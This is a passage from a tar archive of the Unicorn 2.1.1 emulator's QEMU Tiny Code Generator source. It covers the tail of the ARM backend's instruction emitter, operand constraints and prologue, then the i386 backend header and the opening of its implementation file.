INDEX_op_ld8u_i32: tcg_out_ld8u(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_ld8s_i32: tcg_out_ld8s(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_ld16u_i32: tcg_out_ld16u(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_ld16s_i32: tcg_out_ld16s(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_ld_i32: tcg_out_ld32u(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_st8_i32: tcg_out_st8(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_st16_i32: tcg_out_st16(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_st_i32: tcg_out_st32(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_movcond_i32: /* Constraints mean that v2 is always in the same register as dest, * so we only need to do "if condition passed, move v1 to dest". */ tcg_out_dat_rIN(s, COND_AL, ARITH_CMP, ARITH_CMN, 0, args[1], args[2], const_args[2]); tcg_out_dat_rIK(s, tcg_cond_to_arm_cond[args[5]], ARITH_MOV, ARITH_MVN, args[0], 0, args[3], const_args[3]); break; case INDEX_op_add_i32: tcg_out_dat_rIN(s, COND_AL, ARITH_ADD, ARITH_SUB, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_sub_i32: if (const_args[1]) { if (const_args[2]) { tcg_out_movi32(s, COND_AL, args[0], args[1] - args[2]); } else { tcg_out_dat_rI(s, COND_AL, ARITH_RSB, args[0], args[2], args[1], 1); } } else { tcg_out_dat_rIN(s, COND_AL, ARITH_SUB, ARITH_ADD, args[0], args[1], args[2], const_args[2]); } break; case INDEX_op_and_i32: tcg_out_dat_rIK(s, COND_AL, ARITH_AND, ARITH_BIC, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_andc_i32: tcg_out_dat_rIK(s, COND_AL, ARITH_BIC, ARITH_AND, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_or_i32: c = ARITH_ORR; goto gen_arith; case INDEX_op_xor_i32: c = ARITH_EOR; /* Fall through. */ gen_arith: tcg_out_dat_rI(s, COND_AL, c, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_add2_i32: a0 = args[0], a1 = args[1], a2 = args[2]; a3 = args[3], a4 = args[4], a5 = args[5]; if (a0 == a3 || (a0 == a5 && !const_args[5])) { a0 = TCG_REG_TMP; } tcg_out_dat_rIN(s, COND_AL, ARITH_ADD | TO_CPSR, ARITH_SUB | TO_CPSR, a0, a2, a4, const_args[4]); tcg_out_dat_rIK(s, COND_AL, ARITH_ADC, ARITH_SBC, a1, a3, a5, const_args[5]); tcg_out_mov_reg(s, COND_AL, args[0], a0); break; case INDEX_op_sub2_i32: a0 = args[0], a1 = args[1], a2 = args[2]; a3 = args[3], a4 = args[4], a5 = args[5]; if ((a0 == a3 && !const_args[3]) || (a0 == a5 && !const_args[5])) { a0 = TCG_REG_TMP; } if (const_args[2]) { if (const_args[4]) { tcg_out_movi32(s, COND_AL, a0, a4); a4 = a0; } tcg_out_dat_rI(s, COND_AL, ARITH_RSB | TO_CPSR, a0, a4, a2, 1); } else { tcg_out_dat_rIN(s, COND_AL, ARITH_SUB | TO_CPSR, ARITH_ADD | TO_CPSR, a0, a2, a4, const_args[4]); } if (const_args[3]) { if (const_args[5]) { tcg_out_movi32(s, COND_AL, a1, a5); a5 = a1; } tcg_out_dat_rI(s, COND_AL, ARITH_RSC, a1, a5, a3, 1); } else { tcg_out_dat_rIK(s, COND_AL, ARITH_SBC, ARITH_ADC, a1, a3, a5, const_args[5]); } tcg_out_mov_reg(s, COND_AL, args[0], a0); break; case INDEX_op_neg_i32: tcg_out_dat_imm(s, COND_AL, ARITH_RSB, args[0], args[1], 0); break; case INDEX_op_not_i32: tcg_out_dat_reg(s, COND_AL, ARITH_MVN, args[0], 0, args[1], SHIFT_IMM_LSL(0)); break; case INDEX_op_mul_i32: tcg_out_mul32(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_mulu2_i32: tcg_out_umull32(s, COND_AL, args[0], args[1], args[2], args[3]); break; case INDEX_op_muls2_i32: tcg_out_smull32(s, COND_AL, args[0], args[1], args[2], args[3]); break; /* XXX: Perhaps args[2] & 0x1f is wrong */ case INDEX_op_shl_i32: c = const_args[2] ? SHIFT_IMM_LSL(args[2] & 0x1f) : SHIFT_REG_LSL(args[2]); goto gen_shift32; case INDEX_op_shr_i32: c = const_args[2] ? (args[2] & 0x1f) ? SHIFT_IMM_LSR(args[2] & 0x1f) : SHIFT_IMM_LSL(0) : SHIFT_REG_LSR(args[2]); goto gen_shift32; case INDEX_op_sar_i32: c = const_args[2] ? (args[2] & 0x1f) ? SHIFT_IMM_ASR(args[2] & 0x1f) : SHIFT_IMM_LSL(0) : SHIFT_REG_ASR(args[2]); goto gen_shift32; case INDEX_op_rotr_i32: c = const_args[2] ? (args[2] & 0x1f) ? SHIFT_IMM_ROR(args[2] & 0x1f) : SHIFT_IMM_LSL(0) : SHIFT_REG_ROR(args[2]); /* Fall through. */ gen_shift32: tcg_out_dat_reg(s, COND_AL, ARITH_MOV, args[0], 0, args[1], c); break; case INDEX_op_rotl_i32: if (const_args[2]) { tcg_out_dat_reg(s, COND_AL, ARITH_MOV, args[0], 0, args[1], ((0x20 - args[2]) & 0x1f) ? SHIFT_IMM_ROR((0x20 - args[2]) & 0x1f) : SHIFT_IMM_LSL(0)); } else { tcg_out_dat_imm(s, COND_AL, ARITH_RSB, TCG_REG_TMP, args[2], 0x20); tcg_out_dat_reg(s, COND_AL, ARITH_MOV, args[0], 0, args[1], SHIFT_REG_ROR(TCG_REG_TMP)); } break; case INDEX_op_ctz_i32: tcg_out_dat_reg(s, COND_AL, INSN_RBIT, TCG_REG_TMP, 0, args[1], 0); a1 = TCG_REG_TMP; goto do_clz; case INDEX_op_clz_i32: a1 = args[1]; do_clz: a0 = args[0]; a2 = args[2]; c = const_args[2]; if (c && a2 == 32) { tcg_out_dat_reg(s, COND_AL, INSN_CLZ, a0, 0, a1, 0); break; } tcg_out_dat_imm(s, COND_AL, ARITH_CMP, 0, a1, 0); tcg_out_dat_reg(s, COND_NE, INSN_CLZ, a0, 0, a1, 0); if (c || a0 != a2) { tcg_out_dat_rIK(s, COND_EQ, ARITH_MOV, ARITH_MVN, a0, 0, a2, c); } break; case INDEX_op_brcond_i32: tcg_out_dat_rIN(s, COND_AL, ARITH_CMP, ARITH_CMN, 0, args[0], args[1], const_args[1]); tcg_out_goto_label(s, tcg_cond_to_arm_cond[args[2]], arg_label(args[3])); break; case INDEX_op_setcond_i32: tcg_out_dat_rIN(s, COND_AL, ARITH_CMP, ARITH_CMN, 0, args[1], args[2], const_args[2]); tcg_out_dat_imm(s, tcg_cond_to_arm_cond[args[3]], ARITH_MOV, args[0], 0, 1); tcg_out_dat_imm(s, tcg_cond_to_arm_cond[tcg_invert_cond(args[3])], ARITH_MOV, args[0], 0, 0); break; case INDEX_op_brcond2_i32: c = tcg_out_cmp2(s, args, const_args); tcg_out_goto_label(s, tcg_cond_to_arm_cond[c], arg_label(args[5])); break; case INDEX_op_setcond2_i32: c = tcg_out_cmp2(s, args + 1, const_args + 1); tcg_out_dat_imm(s, tcg_cond_to_arm_cond[c], ARITH_MOV, args[0], 0, 1); tcg_out_dat_imm(s, tcg_cond_to_arm_cond[tcg_invert_cond(c)], ARITH_MOV, args[0], 0, 0); break; case INDEX_op_qemu_ld_i32: tcg_out_qemu_ld(s, args, 0); break; case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, args, 1); break; case INDEX_op_qemu_st_i32: tcg_out_qemu_st(s, args, 0); break; case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, args, 1); break; case INDEX_op_bswap16_i32: tcg_out_bswap16(s, COND_AL, args[0], args[1]); break; case INDEX_op_bswap32_i32: tcg_out_bswap32(s, COND_AL, args[0], args[1]); break; case INDEX_op_ext8s_i32: tcg_out_ext8s(s, COND_AL, args[0], args[1]); break; case INDEX_op_ext16s_i32: tcg_out_ext16s(s, COND_AL, args[0], args[1]); break; case INDEX_op_ext16u_i32: tcg_out_ext16u(s, COND_AL, args[0], args[1]); break; case INDEX_op_deposit_i32: tcg_out_deposit(s, COND_AL, args[0], args[2], args[3], args[4], const_args[2]); break; case INDEX_op_extract_i32: tcg_out_extract(s, COND_AL, args[0], args[1], args[2], args[3]); break; case INDEX_op_sextract_i32: tcg_out_sextract(s, COND_AL, args[0], args[1], args[2], args[3]); break; case INDEX_op_extract2_i32: /* ??? These optimization vs zero should be generic. */ /* ??? But we can't substitute 2 for 1 in the opcode stream yet. */ if (const_args[1]) { if (const_args[2]) { tcg_out_movi(s, TCG_TYPE_REG, args[0], 0); } else { tcg_out_dat_reg(s, COND_AL, ARITH_MOV, args[0], 0, args[2], SHIFT_IMM_LSL(32 - args[3])); } } else if (const_args[2]) { tcg_out_dat_reg(s, COND_AL, ARITH_MOV, args[0], 0, args[1], SHIFT_IMM_LSR(args[3])); } else { /* We can do extract2 in 2 insns, vs the 3 required otherwise. */ tcg_out_dat_reg(s, COND_AL, ARITH_MOV, TCG_REG_TMP, 0, args[2], SHIFT_IMM_LSL(32 - args[3])); tcg_out_dat_reg(s, COND_AL, ARITH_ORR, args[0], TCG_REG_TMP, args[1], SHIFT_IMM_LSR(args[3])); } break; case INDEX_op_div_i32: tcg_out_sdiv(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_divu_i32: tcg_out_udiv(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_mb: tcg_out_mb(s, args[0]); break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_call: /* Always emitted via tcg_out_call. */ default: tcg_abort(); } } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef s_s = { .args_ct_str = { "s", "s" } }; static const TCGTargetOpDef r_l = { .args_ct_str = { "r", "l" } }; static const TCGTargetOpDef r_r_r = { .args_ct_str = { "r", "r", "r" } }; static const TCGTargetOpDef r_r_l = { .args_ct_str = { "r", "r", "l" } }; static const TCGTargetOpDef r_l_l = { .args_ct_str = { "r", "l", "l" } }; static const TCGTargetOpDef s_s_s = { .args_ct_str = { "s", "s", "s" } }; static const TCGTargetOpDef r_r_ri = { .args_ct_str = { "r", "r", "ri" } }; static const TCGTargetOpDef r_r_rI = { .args_ct_str = { "r", "r", "rI" } }; static const TCGTargetOpDef r_r_rIN = { .args_ct_str = { "r", "r", "rIN" } }; static const TCGTargetOpDef r_r_rIK = { .args_ct_str = { "r", "r", "rIK" } }; static const TCGTargetOpDef r_r_r_r = { .args_ct_str = { "r", "r", "r", "r" } }; static const TCGTargetOpDef r_r_l_l = { .args_ct_str = { "r", "r", "l", "l" } }; static const TCGTargetOpDef s_s_s_s = { .args_ct_str = { "s", "s", "s", "s" } }; static const TCGTargetOpDef br = { .args_ct_str = { "r", "rIN" } }; static const TCGTargetOpDef ext2 = { .args_ct_str = { "r", "rZ", "rZ" } }; static const TCGTargetOpDef dep = { .args_ct_str = { "r", "0", "rZ" } }; static const TCGTargetOpDef movc = { .args_ct_str = { "r", "r", "rIN", "rIK", "0" } }; static const TCGTargetOpDef add2 = { .args_ct_str = { "r", "r", "r", "r", "rIN", "rIK" } }; static const TCGTargetOpDef sub2 = { .args_ct_str = { "r", "r", "rI", "rI", "rIN", "rIK" } }; static const TCGTargetOpDef br2 = { .args_ct_str = { "r", "r", "rI", "rI" } }; static const TCGTargetOpDef setc2 = { .args_ct_str = { "r", "r", "r", "rI", "rI" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8s_i32: case INDEX_op_ld16u_i32: case INDEX_op_ld16s_i32: case INDEX_op_ld_i32: case INDEX_op_st8_i32: case INDEX_op_st16_i32: case INDEX_op_st_i32: case INDEX_op_neg_i32: case INDEX_op_not_i32: case INDEX_op_bswap16_i32: case INDEX_op_bswap32_i32: case INDEX_op_ext8s_i32: case INDEX_op_ext16s_i32: case INDEX_op_ext16u_i32: case INDEX_op_extract_i32: case INDEX_op_sextract_i32: return &r_r; case INDEX_op_add_i32: case INDEX_op_sub_i32: case INDEX_op_setcond_i32: return &r_r_rIN; case INDEX_op_and_i32: case INDEX_op_andc_i32: case INDEX_op_clz_i32: case INDEX_op_ctz_i32: return &r_r_rIK; case INDEX_op_mul_i32: case INDEX_op_div_i32: case INDEX_op_divu_i32: return &r_r_r; case INDEX_op_mulu2_i32: case INDEX_op_muls2_i32: return &r_r_r_r; case INDEX_op_or_i32: case INDEX_op_xor_i32: return &r_r_rI; case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: case INDEX_op_rotl_i32: case INDEX_op_rotr_i32: return &r_r_ri; case INDEX_op_brcond_i32: return &br; case INDEX_op_deposit_i32: return &dep; case INDEX_op_extract2_i32: return &ext2; case INDEX_op_movcond_i32: return &movc; case INDEX_op_add2_i32: return &add2; case INDEX_op_sub2_i32: return &sub2; case INDEX_op_brcond2_i32: return &br2; case INDEX_op_setcond2_i32: return &setc2; case INDEX_op_qemu_ld_i32: return TARGET_LONG_BITS == 32 ? &r_l : &r_l_l; case INDEX_op_qemu_ld_i64: return TARGET_LONG_BITS == 32 ? &r_r_l : &r_r_l_l; case INDEX_op_qemu_st_i32: return TARGET_LONG_BITS == 32 ? &s_s : &s_s_s; case INDEX_op_qemu_st_i64: return TARGET_LONG_BITS == 32 ? &s_s_s : &s_s_s_s; default: return NULL; } } static void tcg_target_init(TCGContext *s) { /* Only probe for the platform and capabilities if we havn't already determined maximum values at compile time. */ #ifndef __ARM_ARCH_EXT_IDIV__ { unsigned long hwcap = qemu_getauxval(AT_HWCAP); use_idiv_instructions = (hwcap & HWCAP_ARM_IDIVA) != 0; } #endif if (__ARM_ARCH < 7) { const char *pl = (const char *)qemu_getauxval(AT_PLATFORM); if (pl != NULL && pl[0] == 'v' && pl[1] >= '4' && pl[1] <= '9') { arm_arch = pl[1] - '0'; } } s->tcg_target_available_regs[TCG_TYPE_I32] = 0xffff; s->tcg_target_call_clobber_regs = 0; tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R0); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R2); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R3); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R12); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R14); s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_REG_CALL_STACK); tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP); tcg_regset_set_reg(s->reserved_regs, TCG_REG_PC); } static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { tcg_out_ld32u(s, COND_AL, arg, arg1, arg2); } static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { tcg_out_st32(s, COND_AL, arg, arg1, arg2); } static inline bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { return false; } static inline bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) { tcg_out_mov_reg(s, COND_AL, ret, arg); return true; } static inline void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg) { tcg_out_movi32(s, COND_AL, ret, arg); } static void tcg_out_nop_fill(tcg_insn_unit *p, int count) { int i; for (i = 0; i < count; ++i) { p[i] = INSN_NOP; } } /* Compute frame size via macros, to share between tcg_target_qemu_prologue and tcg_register_jit. */ #define PUSH_SIZE ((11 - 4 + 1 + 1) * sizeof(tcg_target_long)) #define FRAME_SIZE \ ((PUSH_SIZE \ + TCG_STATIC_CALL_ARGS_SIZE \ + CPU_TEMP_BUF_NLONGS * sizeof(long) \ + TCG_TARGET_STACK_ALIGN - 1) \ & -TCG_TARGET_STACK_ALIGN) #define STACK_ADDEND (FRAME_SIZE - PUSH_SIZE) static void tcg_target_qemu_prologue(TCGContext *s) { /* Calling convention requires us to save r4-r11 and lr. */ /* stmdb sp!, { r4 - r11, lr } */ tcg_out32(s, (COND_AL << 28) | 0x092d4ff0); /* Reserve callee argument and tcg temp space. */ tcg_out_dat_rI(s, COND_AL, ARITH_SUB, TCG_REG_CALL_STACK, TCG_REG_CALL_STACK, STACK_ADDEND, 1); tcg_set_frame(s, TCG_REG_CALL_STACK, TCG_STATIC_CALL_ARGS_SIZE, CPU_TEMP_BUF_NLONGS * sizeof(long)); tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); tcg_out_bx(s, COND_AL, tcg_target_call_iarg_regs[1]); /* * Return path for goto_ptr. Set return value to 0, a-la exit_tb, * and fall through to the rest of the epilogue. */ s->code_gen_epilogue = s->code_ptr; tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R0, 0); tcg_out_epilogue(s); } static void tcg_out_epilogue(TCGContext *s) { /* Release local stack frame. */ tcg_out_dat_rI(s, COND_AL, ARITH_ADD, TCG_REG_CALL_STACK, TCG_REG_CALL_STACK, STACK_ADDEND, 1); /* ldmia sp!, { r4 - r11, pc } */ tcg_out32(s, (COND_AL << 28) | 0x08bd8ff0); } typedef struct { DebugFrameHeader h; uint8_t fde_def_cfa[4]; uint8_t fde_reg_ofs[18]; } DebugFrame; #define ELF_HOST_MACHINE EM_ARM /* We're expecting a 2 byte uleb128 encoded value. */ QEMU_BUILD_BUG_ON(FRAME_SIZE >= (1 << 14)); static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE)-4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = 0x7c, /* sleb128 -4 */ .h.cie.return_column = 14, /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { 12, 13, /* DW_CFA_def_cfa sp, ... */ (FRAME_SIZE & 0x7f) | 0x80, /* ... uleb128 FRAME_SIZE */ (FRAME_SIZE >> 7) }, .fde_reg_ofs = { /* The following must match the stmdb in the prologue. */ 0x8e, 1, /* DW_CFA_offset, lr, -4 */ 0x8b, 2, /* DW_CFA_offset, r11, -8 */ 0x8a, 3, /* DW_CFA_offset, r10, -12 */ 0x89, 4, /* DW_CFA_offset, r9, -16 */ 0x88, 5, /* DW_CFA_offset, r8, -20 */ 0x87, 6, /* DW_CFA_offset, r7, -24 */ 0x86, 7, /* DW_CFA_offset, r6, -28 */ 0x85, 8, /* DW_CFA_offset, r5, -32 */ 0x84, 9, /* DW_CFA_offset, r4, -36 */ } }; void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size) { tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame)); } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/i386/������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015421�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/i386/tcg-target.h������������������������������������������������������������0000664�0000000�0000000�00000017321�14675241067�0017637�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef I386_TCG_TARGET_H #define I386_TCG_TARGET_H #define TCG_TARGET_INSN_UNIT_SIZE 1 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 31 #ifdef __x86_64__ # define TCG_TARGET_REG_BITS 64 # define TCG_TARGET_NB_REGS 32 #else # define TCG_TARGET_REG_BITS 32 # define TCG_TARGET_NB_REGS 24 #endif typedef enum { TCG_REG_EAX = 0, TCG_REG_ECX, TCG_REG_EDX, TCG_REG_EBX, TCG_REG_ESP, TCG_REG_EBP, TCG_REG_ESI, TCG_REG_EDI, /* 64-bit registers; always define the symbols to avoid too much if-deffing. */ TCG_REG_R8, TCG_REG_R9, TCG_REG_R10, TCG_REG_R11, TCG_REG_R12, TCG_REG_R13, TCG_REG_R14, TCG_REG_R15, TCG_REG_XMM0, TCG_REG_XMM1, TCG_REG_XMM2, TCG_REG_XMM3, TCG_REG_XMM4, TCG_REG_XMM5, TCG_REG_XMM6, TCG_REG_XMM7, /* 64-bit registers; likewise always define. */ TCG_REG_XMM8, TCG_REG_XMM9, TCG_REG_XMM10, TCG_REG_XMM11, TCG_REG_XMM12, TCG_REG_XMM13, TCG_REG_XMM14, TCG_REG_XMM15, TCG_REG_RAX = TCG_REG_EAX, TCG_REG_RCX = TCG_REG_ECX, TCG_REG_RDX = TCG_REG_EDX, TCG_REG_RBX = TCG_REG_EBX, TCG_REG_RSP = TCG_REG_ESP, TCG_REG_RBP = TCG_REG_EBP, TCG_REG_RSI = TCG_REG_ESI, TCG_REG_RDI = TCG_REG_EDI, TCG_AREG0 = TCG_REG_EBP, TCG_REG_CALL_STACK = TCG_REG_ESP } TCGReg; /* used for function call generation */ #define TCG_TARGET_STACK_ALIGN 16 #if defined(_WIN64) #define TCG_TARGET_CALL_STACK_OFFSET 32 #else #define TCG_TARGET_CALL_STACK_OFFSET 0 #endif extern bool have_bmi1; extern bool have_popcnt; extern bool have_avx1; extern bool have_avx2; /* optional instructions */ #define TCG_TARGET_HAS_div2_i32 1 #define TCG_TARGET_HAS_rot_i32 1 #define TCG_TARGET_HAS_ext8s_i32 1 #define TCG_TARGET_HAS_ext16s_i32 1 #define TCG_TARGET_HAS_ext8u_i32 1 #define TCG_TARGET_HAS_ext16u_i32 1 #define TCG_TARGET_HAS_bswap16_i32 1 #define TCG_TARGET_HAS_bswap32_i32 1 #define TCG_TARGET_HAS_neg_i32 1 #define TCG_TARGET_HAS_not_i32 1 #define TCG_TARGET_HAS_andc_i32 have_bmi1 #define TCG_TARGET_HAS_orc_i32 0 #define TCG_TARGET_HAS_eqv_i32 0 #define TCG_TARGET_HAS_nand_i32 0 #define TCG_TARGET_HAS_nor_i32 0 #define TCG_TARGET_HAS_clz_i32 1 #define TCG_TARGET_HAS_ctz_i32 1 #define TCG_TARGET_HAS_ctpop_i32 have_popcnt #define TCG_TARGET_HAS_deposit_i32 1 #define TCG_TARGET_HAS_extract_i32 1 #define TCG_TARGET_HAS_sextract_i32 1 #define TCG_TARGET_HAS_extract2_i32 1 #define TCG_TARGET_HAS_movcond_i32 1 #define TCG_TARGET_HAS_add2_i32 1 #define TCG_TARGET_HAS_sub2_i32 1 #define TCG_TARGET_HAS_mulu2_i32 1 #define TCG_TARGET_HAS_muls2_i32 1 #define TCG_TARGET_HAS_muluh_i32 0 #define TCG_TARGET_HAS_mulsh_i32 0 #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_direct_jump 1 #if TCG_TARGET_REG_BITS == 64 /* Keep target addresses zero-extended in a register. */ #define TCG_TARGET_HAS_extrl_i64_i32 (TARGET_LONG_BITS == 32) #define TCG_TARGET_HAS_extrh_i64_i32 (TARGET_LONG_BITS == 32) #define TCG_TARGET_HAS_div2_i64 1 #define TCG_TARGET_HAS_rot_i64 1 #define TCG_TARGET_HAS_ext8s_i64 1 #define TCG_TARGET_HAS_ext16s_i64 1 #define TCG_TARGET_HAS_ext32s_i64 1 #define TCG_TARGET_HAS_ext8u_i64 1 #define TCG_TARGET_HAS_ext16u_i64 1 #define TCG_TARGET_HAS_ext32u_i64 1 #define TCG_TARGET_HAS_bswap16_i64 1 #define TCG_TARGET_HAS_bswap32_i64 1 #define TCG_TARGET_HAS_bswap64_i64 1 #define TCG_TARGET_HAS_neg_i64 1 #define TCG_TARGET_HAS_not_i64 1 #define TCG_TARGET_HAS_andc_i64 have_bmi1 #define TCG_TARGET_HAS_orc_i64 0 #define TCG_TARGET_HAS_eqv_i64 0 #define TCG_TARGET_HAS_nand_i64 0 #define TCG_TARGET_HAS_nor_i64 0 #define TCG_TARGET_HAS_clz_i64 1 #define TCG_TARGET_HAS_ctz_i64 1 #define TCG_TARGET_HAS_ctpop_i64 have_popcnt #define TCG_TARGET_HAS_deposit_i64 1 #define TCG_TARGET_HAS_extract_i64 1 #define TCG_TARGET_HAS_sextract_i64 0 #define TCG_TARGET_HAS_extract2_i64 1 #define TCG_TARGET_HAS_movcond_i64 1 #define TCG_TARGET_HAS_add2_i64 1 #define TCG_TARGET_HAS_sub2_i64 1 #define TCG_TARGET_HAS_mulu2_i64 1 #define TCG_TARGET_HAS_muls2_i64 1 #define TCG_TARGET_HAS_muluh_i64 0 #define TCG_TARGET_HAS_mulsh_i64 0 #endif /* We do not support older SSE systems, only beginning with AVX1. */ #define TCG_TARGET_HAS_v64 have_avx1 #define TCG_TARGET_HAS_v128 have_avx1 #define TCG_TARGET_HAS_v256 have_avx2 #define TCG_TARGET_HAS_andc_vec 1 #define TCG_TARGET_HAS_orc_vec 0 #define TCG_TARGET_HAS_not_vec 0 #define TCG_TARGET_HAS_neg_vec 0 #define TCG_TARGET_HAS_abs_vec 1 #define TCG_TARGET_HAS_shi_vec 1 #define TCG_TARGET_HAS_shs_vec 1 #define TCG_TARGET_HAS_shv_vec have_avx2 #define TCG_TARGET_HAS_cmp_vec 1 #define TCG_TARGET_HAS_mul_vec 1 #define TCG_TARGET_HAS_sat_vec 1 #define TCG_TARGET_HAS_minmax_vec 1 #define TCG_TARGET_HAS_bitsel_vec 0 #define TCG_TARGET_HAS_cmpsel_vec -1 #define TCG_TARGET_deposit_i32_valid(ofs, len) \ (((ofs) == 0 && (len) == 8) || ((ofs) == 8 && (len) == 8) || \ ((ofs) == 0 && (len) == 16)) #define TCG_TARGET_deposit_i64_valid TCG_TARGET_deposit_i32_valid /* Check for the possibility of high-byte extraction and, for 64-bit, zero-extending 32-bit right-shift. */ #define TCG_TARGET_extract_i32_valid(ofs, len) ((ofs) == 8 && (len) == 8) #define TCG_TARGET_extract_i64_valid(ofs, len) \ (((ofs) == 8 && (len) == 8) || ((ofs) + (len)) == 32) static inline void flush_icache_range(uintptr_t start, uintptr_t stop) { } static inline void tb_target_set_jmp_target(uintptr_t tc_ptr, uintptr_t jmp_addr, uintptr_t addr) { /* patch the branch destination */ *(int32_t *)jmp_addr = addr - (jmp_addr + 4); /* no need to flush icache explicitly */ } /* This defines the natural memory order supported by this * architecture before guarantees made by various barrier * instructions. * * The x86 has a pretty strong memory ordering which only really * allows for some stores to be re-ordered after loads. */ #include "tcg/tcg-mo.h" #define TCG_TARGET_DEFAULT_MO (TCG_MO_ALL & ~TCG_MO_ST_LD) #define TCG_TARGET_HAS_MEMORY_BSWAP 1 #define TCG_TARGET_NEED_LDST_LABELS #define TCG_TARGET_NEED_POOL_LABELS #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/i386/tcg-target.inc.c��������������������������������������������������������0000664�0000000�0000000�00000371367�14675241067�0020417�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "../tcg-pool.inc.c" #ifdef _MSC_VER #include <intrin.h> #endif #ifdef CONFIG_DEBUG_TCG static const char * const 